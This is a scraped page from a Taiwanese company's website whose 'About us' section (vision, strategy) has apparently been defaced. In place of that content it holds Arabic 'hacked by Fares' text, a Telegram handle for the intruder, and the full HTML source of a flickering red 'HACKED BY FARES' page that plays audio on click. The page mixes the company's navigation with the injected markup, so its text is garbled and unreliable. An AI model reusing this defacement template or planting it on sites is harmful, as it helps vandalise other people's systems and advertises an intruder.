English | 中文版
 


中光電智能感測股份有限公司
晶豪科技股份有限公司
盛群半導體股份有限公司
兆易創新科技集團有限公司
晶發半導體股份有限公司
亞瑟萊特科技股份有限公司
亞驪企業股份有限公司
大辰科技股份有限公司
源微创新集团


泰得首頁 > 關於泰得
經營理念與願景

 

تم اختراقه بواسطة فارس

شارك: @xx96r

策略與佈局

<!DOCTYPE html>

<html lang="en">

<head>

  <meta charset="UTF-8">

  <title>Hacked by Fares</title>

  <style>

    html, body {

      margin: 0;

      padding: 0;

      height: 100%;

      width: 100%;

      background: black;

      overflow: hidden;

      font-family: 'Courier New', monospace;

      color: red;

    }


    .container {

      position: absolute;

      top: 50%;

      left: 50%;

      transform: translate(-50%, -50%);

      text-align: center;

      z-index: 10;

    }


    h1 {

      font-size: 4em;

      text-shadow: 0 0 10px red, 0 0 20px red;

      animation: flicker 1.2s infinite alternate;

    }


    p {

      font-size: 2em;

      text-shadow: 0 0 5px red;

      animation: flickerText 2s infinite alternate;

    }


    @keyframes flicker {

      0% { opacity: 1; }

      50% { opacity: 0.5; transform: scale(1.02); }

      100% { opacity: 1; }

    }


    @keyframes flickerText {

      0% { opacity: 0.7; }

      100% { opacity: 1; }

    }


    .overlay {

      position: fixed;

      top: 0;

      left: 0;

      width: 100%;

      height: 100%;

      background: radial-gradient(circle, rgba(255,0,0,0.2) 0%, rgba(0,0,0,0.9) 80%);

      animation: pulse 6s infinite;

      z-index: 1;

    }


    @keyframes pulse {

      0% { opacity: 0.2; }

      50% { opacity: 0.5; }

      100% { opacity: 0.2; }

    }


    .scanline {

      position: absolute;

      top: 0;

      left: 0;

      width: 100%;

      height: 3px;

      background: red;

      animation: scan 4s linear infinite;

      z-index: 5;

      opacity: 0.3;

    }


    @keyframes scan {

      0% { top: 0%; }

      100% { top: 100%; }

    }

  </style>

</head>

<body>

  <div class="overlay"></div>

  <div class="scanline"></div>

  <div class="container">

    <h1>HACKED BY FARES</h1>

    <p>Telegram: @xx96r</p>

  </div>


  <audio id="bg-audio" loop>

    <source src="https://cdn.pixabay.com/download/audio/2022/03/15/audio_12a79df404.mp3" type="audio/mpeg">

  </audio>


  <script>

    // تشغيل الصوت عند أول تفاعل

    document.addEventListener("click", () => {

      const audio = document.getElementById("bg-audio");

      if (audio.paused) {

        audio.play();

      }

    });

  </script>

</body>

</html>


 
泰得國際股份有限公司 版權所有 ©All rights reserved.